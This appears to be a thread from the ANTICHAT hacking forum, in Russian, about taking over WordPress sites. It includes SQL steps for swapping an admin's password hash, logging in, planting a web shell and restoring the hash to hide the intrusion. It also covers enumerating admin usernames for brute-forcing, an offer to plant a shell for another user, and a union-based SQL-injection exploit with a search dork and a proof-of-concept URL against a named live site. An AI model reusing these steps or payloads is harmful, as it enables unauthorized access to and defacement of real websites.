ANTICHAT — форум по информационной безопасности, OSINT и технологиям

Моя бы схема выглядела так:

1) Есть доступ в бд, но нет расшифрованного пасса? Нет проблем!

Заходим в БД. Пишем запрос

Код:

Code:
select password from users where id=1

Запоминаем/записываем хэшик.

Далее запрашиваем

Код:

Code:
update users set password='NewPassword' where id=1

NewPassword можно взять из любых расшифрованных ВордПресс хэшей. Например в этом сообщении

2) Проверяем, что у нашего юзверя сменился хэшик в БД.

3) site/wp-login.php - логин мы знаем, пасс расшифрованный тоже. Спасибо ВП что ещё соль не надо апдейтить (хотя это +1 запрос к бд, не новички смогут и 1 запросом апдейт сделать)

4) Так как мы внутри - льём шелл, например так

5) Из-под шелла или ещё где цепляемся в бд и делаем запрос

Код:

Code:
update users set password='OldPassword' where id=1

Где OldPassword = старый, сохранённый хэшик.

З.Ы. Прикольно жёлтый цвет на мрачном фоне смотрится =)

не лезит)

WendM напиши в личку логин и хеш залью шелл

Помошник брута

Дело в том что, чем дальше я влажу в ядро движка, тем больше радуюсь тому, что билдеры как-будто специально оставляют нам шансы на проникновение. Сегодня обратил внимание на wp-login.php

Дело в том, что WP позволяет отображать ник, как того пожелает сам автор, отнюдь, не всегда админ использует логин "admin". Довольно часто приходится брутить... Но как же брутить, если мы не знаем логин админа? В этом нам помогает движок. Дело в том, что скрипт сам помогает нам найти логин админа с помощью того же брута. Возьмем случайны блог и гугла.

Введем в качестве логина "superuser", а в качестве пасса "123". На что получим подсказку, что юзера с ником "superuser" в базе нет....



Введем логин "admin" и пароль к примеру "test", в результате получаем:



Конечно не новшество, но мне частенько пригождается.

Один из первых шагов по безопасности Wordpress смена страницы входа в админку - wp-login.php

Подскажите пожалуйста, как использовать полученные при помощи программы WP_Cracker логин и хэш? чтобы редактировать сайт

Как создатель софтины - советую прочитать отдельную тему по ней тут

вопрос, есть админка, темы и плагины нельзя с неё редактировать.

какие еще методы есть чтоб залить шел? вп 3.4.1

fs real estate plugin SQL-Inj

# Exploit Title: fs real estate plugin SQL-Inj

# Date: Oct 2, 2012

#Exploit Author: z0mbyak

# Vendor Homepage: find by yourself

# Software Link: find by yourself

# Version: don't know

# Tested in: web

# Dork: inurl:"marker_listings.xml?id"

# Exploit: -2+union+select+version(),2,3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30,31--

# PoC:

http://themacnabs.com/wp-content/plugins/fs-real-estate-plugin/xml/marker_listings.xml?id=-2+union+select+version(),2,3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30,31--

P.S. Кол-во колонок может отличаться...

P.P.S. Мб, боян, по wp не работаю)